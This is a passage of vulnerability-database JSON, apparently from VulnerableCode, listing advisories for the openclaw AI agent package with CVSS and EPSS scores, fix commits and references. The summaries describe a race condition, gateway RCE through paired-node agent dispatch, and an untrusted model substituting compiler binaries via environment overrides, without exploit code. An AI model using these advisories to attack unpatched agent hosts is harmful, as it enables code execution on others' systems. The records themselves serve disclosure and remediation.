                            "scoring_system": "epss",
                            "scoring_elements": "0.11564",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-44113"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/95119017c847c737bd113f0bff728c4666d79c45",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:04:19Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/95119017c847c737bd113f0bff728c4666d79c45"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5h3g-6xhh-rg6p",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:04:19Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5h3g-6xhh-rg6p"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44113",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44113"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-time-of-check-time-of-use-race-condition-in-openshell-fs-bridge",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"
                        },
                        {
                            "value": "6.0",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T13:04:19Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-time-of-check-time-of-use-race-condition-in-openshell-fs-bridge"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-5h3g-6xhh-rg6p",
                    "reference_id": "GHSA-5h3g-6xhh-rg6p",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-5h3g-6xhh-rg6p"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/114466?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"
                }
            ],
            "aliases": [
                "CVE-2026-44113",
                "GHSA-5h3g-6xhh-rg6p"
            ],
            "risk_score": 3.8,
            "exploitability": "0.5",
            "weighted_severity": "7.5",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ymmv-2qmq-6kap"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89362?format=api",
            "vulnerability_id": "VCID-ynup-4v9e-tbh4",
            "summary": "OpenClaw: Incomplete host-env-security-policy allows untrusted model to substitute compiler binaries via env overrides\n## Summary\nIncomplete `host-env-security-policy.json` allows an untrusted model to substitute compiler binaries (`CC`, `CXX`, `CARGO_BUILD_RUSTC`, `CMAKE_C_COMPILER`) via env overrides on approved host exec requests.\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: The host-env policy shipped in v2026.3.28 missed compiler override vars, but exploitation still requires an approved host-exec request inside the existing exec trust domain, so the severity is medium, not high.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `e277a37f896b5011a1df06e6490c6630074d0afa` — 2026-03-30T20:06:32+01:00\n\nOpenClaw thanks @tdjackey for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41373",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02541",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02487",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00014",
                            "scoring_system": "epss",
                            "scoring_elements": "0.02543",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41373"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/e277a37f896b5011a1df06e6490c6630074d0afa",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/e277a37f896b5011a1df06e6490c6630074d0afa"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g8xp-qx39-9jq9",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-g8xp-qx39-9jq9"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41373",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41373"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-compiler-binary-substitution-via-environment-variable-override-in-host-execution-policy",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-compiler-binary-substitution-via-environment-variable-override-in-host-execution-policy"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-g8xp-qx39-9jq9",
                    "reference_id": "GHSA-g8xp-qx39-9jq9",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-g8xp-qx39-9jq9"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41373",
                "GHSA-g8xp-qx39-9jq9"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ynup-4v9e-tbh4"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90041?format=api",
            "vulnerability_id": "VCID-yp2w-pc58-9bf6",
            "summary": "OpenClaw: Paired node escalates to gateway RCE via unrestricted node.event agent dispatch\n## Summary\nA paired node can escalate to remote code execution (RCE) on the gateway through unrestricted `node.event` agent dispatch.\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: high\n- Assessment: v2026.3.28 still lets paired role=node clients drive `node.event` `agent.request` into broader gateway-side tool access than node RPCs provide; a critical rating is overstated because a trusted paired-node foothold is already required.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `a77928b1087e90f2a8903f8e5aca6dec9237ac62` — 2026-03-30T14:22:15+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41378",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00285",
                            "scoring_system": "epss",
                            "scoring_elements": "0.52312",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00285",
                            "scoring_system": "epss",
                            "scoring_elements": "0.52299",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00285",
                            "scoring_system": "epss",
                            "scoring_elements": "0.5232",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41378"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/a77928b1087e90f2a8903f8e5aca6dec9237ac62",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:53:49Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/a77928b1087e90f2a8903f8e5aca6dec9237ac62"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gjm7-hw8f-73rq",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:53:49Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gjm7-hw8f-73rq"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41378",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41378"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-to-remote-code-execution-via-unrestricted-node-event-agent-dispatch",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "7.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T13:53:49Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-to-remote-code-execution-via-unrestricted-node-event-agent-dispatch"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-gjm7-hw8f-73rq",
                    "reference_id": "GHSA-gjm7-hw8f-73rq",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-gjm7-hw8f-73rq"
                }
            ],
            "fixed_packages": [
                {
